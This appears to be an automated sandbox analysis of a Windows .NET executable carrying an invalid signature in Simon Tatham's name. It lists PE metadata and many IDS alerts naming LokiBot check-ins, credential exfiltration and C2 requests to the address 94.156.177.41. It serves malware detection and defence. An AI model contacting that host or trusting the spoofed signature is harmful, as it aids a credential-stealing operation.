                                                                                  SHA512:df9c87a3e89790924d63afbd1dc339178d08b0f394da16b728ee67d994337096ff969de6224a49a4e6369a2329fe4db9e5a89eb6c3f4f068e56b0365d02f2d0e
                                                                                  SSDEEP:12288:+y4IR4R52J+XtWdNIyh1yxrgS1j/3XRaOzqiCShFgw64mLobm/IRskR:H4Iee7XthkxkS1jMi/KIt
                                                                                  TLSH:A4D4D09C3600F44FC943C5718EB4EDB4AA687DEA970382035AE71EEFF85D9569E041E2
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Og..............0......P......^7... ...@....@.. ....................................@................................
                                                                                  Icon Hash:033424c4c199d839
                                                                                  Entrypoint:0x49375e
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x674FADE2 [Wed Dec 4 01:18:26 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Signature Valid:false
                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                  Error Number:-2146869232
                                                                                  Not Before, Not After
                                                                                  • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                                  Subject Chain
                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                  Version:3
                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x937100x4b.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x940000x4dd0.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x96a000x3608
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000x917640x91800c8462729e87d10658fc3d76504f22c57False0.879688171176976data7.674643796191771IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0x940000x4dd00x4e00b9927b67cd3d9f514de3a149dd3af280False0.9459134615384616data7.795169991313931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x9a0000xc0x20005ec29c2630c84f3ec38e6f200905009False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x941300x46f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9932852661126094
                                                                                  RT_GROUP_ICON0x9882c0x14data1.05
                                                                                  RT_VERSION0x988400x3a0data0.4191810344827586
                                                                                  RT_MANIFEST0x98be00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-04T06:52:06.767642+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973794.156.177.4180TCP
                                                                                  2024-12-04T06:52:06.767642+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973794.156.177.4180TCP
                                                                                  2024-12-04T06:52:06.767642+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973794.156.177.4180TCP
                                                                                  2024-12-04T06:52:08.289516+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973794.156.177.4180TCP
                                                                                  2024-12-04T06:52:08.695716+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973894.156.177.4180TCP
                                                                                  2024-12-04T06:52:08.695716+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973894.156.177.4180TCP
                                                                                  2024-12-04T06:52:08.695716+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973894.156.177.4180TCP
                                                                                  2024-12-04T06:52:10.175294+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973894.156.177.4180TCP
                                                                                  2024-12-04T06:52:10.478754+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973994.156.177.4180TCP
                                                                                  2024-12-04T06:52:10.478754+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973994.156.177.4180TCP
                                                                                  2024-12-04T06:52:10.478754+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973994.156.177.4180TCP
                                                                                  2024-12-04T06:52:11.901579+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44973994.156.177.4180TCP
                                                                                  2024-12-04T06:52:11.901579+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44973994.156.177.4180TCP
                                                                                  2024-12-04T06:52:12.021642+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449739TCP
                                                                                  2024-12-04T06:52:12.295749+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974094.156.177.4180TCP
                                                                                  2024-12-04T06:52:12.295749+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974094.156.177.4180TCP
                                                                                  2024-12-04T06:52:12.295749+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974094.156.177.4180TCP
                                                                                  2024-12-04T06:52:13.773578+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974094.156.177.4180TCP
                                                                                  2024-12-04T06:52:13.773578+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974094.156.177.4180TCP
                                                                                  2024-12-04T06:52:13.893779+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449740TCP
                                                                                  2024-12-04T06:52:14.164338+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974194.156.177.4180TCP
                                                                                  2024-12-04T06:52:14.164338+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974194.156.177.4180TCP
                                                                                  2024-12-04T06:52:14.164338+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974194.156.177.4180TCP
                                                                                  2024-12-04T06:52:15.532769+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974194.156.177.4180TCP
                                                                                  2024-12-04T06:52:15.532769+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974194.156.177.4180TCP
                                                                                  2024-12-04T06:52:15.652893+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449741TCP
                                                                                  2024-12-04T06:52:15.938259+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974394.156.177.4180TCP
                                                                                  2024-12-04T06:52:15.938259+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974394.156.177.4180TCP
                                                                                  2024-12-04T06:52:15.938259+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974394.156.177.4180TCP
                                                                                  2024-12-04T06:52:17.218226+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974394.156.177.4180TCP
                                                                                  2024-12-04T06:52:17.218226+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974394.156.177.4180TCP
                                                                                  2024-12-04T06:52:17.338561+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449743TCP
                                                                                  2024-12-04T06:52:17.657827+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974694.156.177.4180TCP
                                                                                  2024-12-04T06:52:17.657827+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974694.156.177.4180TCP
                                                                                  2024-12-04T06:52:17.657827+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974694.156.177.4180TCP
                                                                                  2024-12-04T06:52:19.025824+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974694.156.177.4180TCP
                                                                                  2024-12-04T06:52:19.025824+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974694.156.177.4180TCP
                                                                                  2024-12-04T06:52:19.145796+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449746TCP
                                                                                  2024-12-04T06:52:19.405358+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975094.156.177.4180TCP
                                                                                  2024-12-04T06:52:19.405358+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975094.156.177.4180TCP
                                                                                  2024-12-04T06:52:19.405358+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975094.156.177.4180TCP
                                                                                  2024-12-04T06:52:20.880675+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975094.156.177.4180TCP
                                                                                  2024-12-04T06:52:20.880675+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975094.156.177.4180TCP
                                                                                  2024-12-04T06:52:21.002459+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449750TCP
                                                                                  2024-12-04T06:52:21.262165+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975294.156.177.4180TCP
                                                                                  2024-12-04T06:52:21.262165+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975294.156.177.4180TCP
                                                                                  2024-12-04T06:52:21.262165+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975294.156.177.4180TCP
                                                                                  2024-12-04T06:52:22.683187+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975294.156.177.4180TCP
                                                                                  2024-12-04T06:52:22.683187+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975294.156.177.4180TCP
                                                                                  2024-12-04T06:52:22.805215+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449752TCP
                                                                                  2024-12-04T06:52:23.073188+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975494.156.177.4180TCP
                                                                                  2024-12-04T06:52:23.073188+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975494.156.177.4180TCP
                                                                                  2024-12-04T06:52:23.073188+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975494.156.177.4180TCP
                                                                                  2024-12-04T06:52:24.551833+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975494.156.177.4180TCP
                                                                                  2024-12-04T06:52:24.551833+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975494.156.177.4180TCP
                                                                                  2024-12-04T06:52:24.671843+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449754TCP
                                                                                  2024-12-04T06:52:24.932098+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975694.156.177.4180TCP
                                                                                  2024-12-04T06:52:24.932098+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975694.156.177.4180TCP
                                                                                  2024-12-04T06:52:24.932098+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975694.156.177.4180TCP
                                                                                  2024-12-04T06:52:26.403488+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975694.156.177.4180TCP
                                                                                  2024-12-04T06:52:26.403488+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975694.156.177.4180TCP
                                                                                  2024-12-04T06:52:26.523527+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449756TCP
                                                                                  2024-12-04T06:52:26.793786+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975794.156.177.4180TCP
                                                                                  2024-12-04T06:52:26.793786+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975794.156.177.4180TCP
                                                                                  2024-12-04T06:52:26.793786+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975794.156.177.4180TCP
                                                                                  2024-12-04T06:52:28.258701+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975794.156.177.4180TCP
                                                                                  2024-12-04T06:52:28.258701+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975794.156.177.4180TCP
                                                                                  2024-12-04T06:52:28.378825+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449757TCP
                                                                                  2024-12-04T06:52:28.638241+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975994.156.177.4180TCP
                                                                                  2024-12-04T06:52:28.638241+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975994.156.177.4180TCP
                                                                                  2024-12-04T06:52:28.638241+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975994.156.177.4180TCP
                                                                                  2024-12-04T06:52:30.177926+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975994.156.177.4180TCP
                                                                                  2024-12-04T06:52:30.177926+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975994.156.177.4180TCP
                                                                                  2024-12-04T06:52:30.298016+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449759TCP
                                                                                  2024-12-04T06:52:30.565483+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976194.156.177.4180TCP
                                                                                  2024-12-04T06:52:30.565483+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976194.156.177.4180TCP
                                                                                  2024-12-04T06:52:30.565483+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976194.156.177.4180TCP
                                                                                  2024-12-04T06:52:32.085852+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976194.156.177.4180TCP
                                                                                  2024-12-04T06:52:32.085852+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976194.156.177.4180TCP
                                                                                  2024-12-04T06:52:32.214744+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449761TCP
                                                                                  2024-12-04T06:52:32.892280+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976294.156.177.4180TCP
                                                                                  2024-12-04T06:52:32.892280+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976294.156.177.4180TCP
                                                                                  2024-12-04T06:52:32.892280+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976294.156.177.4180TCP
                                                                                  2024-12-04T06:52:34.340931+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976294.156.177.4180TCP
                                                                                  2024-12-04T06:52:34.340931+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976294.156.177.4180TCP
                                                                                  2024-12-04T06:52:34.460893+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449762TCP
                                                                                  2024-12-04T06:52:34.734954+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976494.156.177.4180TCP
                                                                                  2024-12-04T06:52:34.734954+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976494.156.177.4180TCP
                                                                                  2024-12-04T06:52:34.734954+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976494.156.177.4180TCP
                                                                                  2024-12-04T06:52:36.018358+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976494.156.177.4180TCP
                                                                                  2024-12-04T06:52:36.018358+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976494.156.177.4180TCP
                                                                                  2024-12-04T06:52:36.138567+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449764TCP
                                                                                  2024-12-04T06:52:36.409350+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976694.156.177.4180TCP
                                                                                  2024-12-04T06:52:36.409350+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976694.156.177.4180TCP
                                                                                  2024-12-04T06:52:36.409350+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976694.156.177.4180TCP
                                                                                  2024-12-04T06:52:37.879906+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976694.156.177.4180TCP
                                                                                  2024-12-04T06:52:37.879906+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976694.156.177.4180TCP
                                                                                  2024-12-04T06:52:38.013205+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449766TCP
                                                                                  2024-12-04T06:52:38.347814+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976794.156.177.4180TCP
                                                                                  2024-12-04T06:52:38.347814+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976794.156.177.4180TCP
                                                                                  2024-12-04T06:52:38.347814+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976794.156.177.4180TCP
                                                                                  2024-12-04T06:52:39.817896+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976794.156.177.4180TCP
                                                                                  2024-12-04T06:52:39.817896+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976794.156.177.4180TCP
                                                                                  2024-12-04T06:52:39.937959+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449767TCP
                                                                                  2024-12-04T06:52:40.197879+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976894.156.177.4180TCP
                                                                                  2024-12-04T06:52:40.197879+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976894.156.177.4180TCP
                                                                                  2024-12-04T06:52:40.197879+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976894.156.177.4180TCP
                                                                                  2024-12-04T06:52:41.707155+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976894.156.177.4180TCP
                                                                                  2024-12-04T06:52:41.707155+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976894.156.177.4180TCP
                                                                                  2024-12-04T06:52:41.827201+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449768TCP
                                                                                  2024-12-04T06:52:42.088177+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976994.156.177.4180TCP
                                                                                  2024-12-04T06:52:42.088177+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976994.156.177.4180TCP
                                                                                  2024-12-04T06:52:42.088177+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976994.156.177.4180TCP
                                                                                  2024-12-04T06:52:43.608002+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976994.156.177.4180TCP
                                                                                  2024-12-04T06:52:43.608002+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976994.156.177.4180TCP
                                                                                  2024-12-04T06:52:43.730471+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449769TCP
                                                                                  2024-12-04T06:52:44.074154+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977094.156.177.4180TCP
                                                                                  2024-12-04T06:52:44.074154+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977094.156.177.4180TCP
                                                                                  2024-12-04T06:52:44.074154+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977094.156.177.4180TCP
                                                                                  2024-12-04T06:52:45.535212+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977094.156.177.4180TCP
                                                                                  2024-12-04T06:52:45.535212+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977094.156.177.4180TCP
                                                                                  2024-12-04T06:52:45.655216+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449770TCP
                                                                                  2024-12-04T06:52:45.927567+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977194.156.177.4180TCP
                                                                                  2024-12-04T06:52:45.927567+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977194.156.177.4180TCP
                                                                                  2024-12-04T06:52:45.927567+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977194.156.177.4180TCP
                                                                                  2024-12-04T06:52:47.435569+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977194.156.177.4180TCP
                                                                                  2024-12-04T06:52:47.435569+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977194.156.177.4180TCP
                                                                                  2024-12-04T06:52:47.555548+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449771TCP
                                                                                  2024-12-04T06:52:47.828393+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977294.156.177.4180TCP
                                                                                  2024-12-04T06:52:47.828393+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977294.156.177.4180TCP
                                                                                  2024-12-04T06:52:47.828393+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977294.156.177.4180TCP
                                                                                  2024-12-04T06:52:49.349051+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977294.156.177.4180TCP
                                                                                  2024-12-04T06:52:49.349051+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977294.156.177.4180TCP
                                                                                  2024-12-04T06:52:49.469198+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449772TCP
                                                                                  2024-12-04T06:52:49.779959+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977394.156.177.4180TCP
                                                                                  2024-12-04T06:52:49.779959+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977394.156.177.4180TCP
                                                                                  2024-12-04T06:52:49.779959+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977394.156.177.4180TCP
                                                                                  2024-12-04T06:52:51.251091+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977394.156.177.4180TCP
                                                                                  2024-12-04T06:52:51.251091+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977394.156.177.4180TCP
                                                                                  2024-12-04T06:52:51.371174+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449773TCP
                                                                                  2024-12-04T06:52:51.635755+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977494.156.177.4180TCP
                                                                                  2024-12-04T06:52:51.635755+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977494.156.177.4180TCP
                                                                                  2024-12-04T06:52:51.635755+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977494.156.177.4180TCP
                                                                                  2024-12-04T06:52:52.949423+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977494.156.177.4180TCP
                                                                                  2024-12-04T06:52:52.949423+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977494.156.177.4180TCP
                                                                                  2024-12-04T06:52:53.071414+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449774TCP
                                                                                  2024-12-04T06:52:53.344478+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977594.156.177.4180TCP
                                                                                  2024-12-04T06:52:53.344478+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977594.156.177.4180TCP
                                                                                  2024-12-04T06:52:53.344478+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44977594.156.177.4180TCP
                                                                                  2024-12-04T06:52:54.623292+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44977594.156.177.4180TCP
                                                                                  2024-12-04T06:52:54.623292+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44977594.156.177.4180TCP
                                                                                  2024-12-04T06:52:54.743376+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.449775TCP
                                                                                  2024-12-04T06:52:55.009703+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44977694.156.177.4180TCP
                                                                                  2024-12-04T06:52:55.009703+01002025381ET MALWARE LokiBot Checkin1192.168.2.44977694.156.177.4180TCP
